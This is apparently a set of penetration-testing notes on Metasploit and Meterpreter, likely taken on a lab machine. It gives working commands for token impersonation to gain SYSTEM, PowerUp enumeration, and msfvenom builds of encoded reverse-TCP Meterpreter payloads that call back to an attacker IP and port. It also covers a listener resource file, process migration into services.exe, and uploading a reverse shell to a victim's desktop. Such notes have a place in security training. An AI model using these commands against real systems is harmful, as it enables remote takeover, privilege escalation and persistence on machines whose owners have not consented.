Metasploit / Meterpreter
Modules
List of modules :
- espia :
- incognito : Allow you to impersonate user tokens.
- lanattacks
- powershell : Enable powershell (interactive shell, single command, ...).
- python
- stdapi
- winpmem
- extapi
- kiwi
- peinjector
- priv
- sniffer
- unhook
Incognito
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[...]
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Powershell
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]
Msfvenom
List payload : msfvenom --list payload
# Windows (EXE)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
-f exe -o shell.exe
# Windows (x86 EXE with encoder)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai \
LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
# Linux (ELF)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
-f elf -o shell.bin
staged
: 2 parts, a listener, then the reverse shell is send to the listener.stageless
: Reverse shell is directly inside the payload.
Ressource file
File msf.rc
:
use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j
Command : msfconsole -r msf.rc
Migrate on process
More information about the migrate command.
Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions.
meterpreter > ps | grep services
Filtering on 'services'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
meterpreter > migrate 668
[*] Migrating from 996 to 668...
[*] Migration completed successfully.
Search for files
meterpreter > search -f shell.exe
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\bruce\Desktop\shell.exe 73802 2021-12-11 12:20:17 +0100
Upload / Download
meterpreter > download shell.exe
[*] Downloading: shell.exe -> /home/.../alfred/shell.exe
[*] Downloaded 72.07 KiB of 72.07 KiB (100.0%): shell.exe -> /home/.../alfred/shell.exe
[*] download : shell.exe -> /home/.../alfred/shell.exe
meterpreter > upload shell.exe 'c:\Users\bruce\Desktop\reverse.exe'
[*] uploading : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] uploaded : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe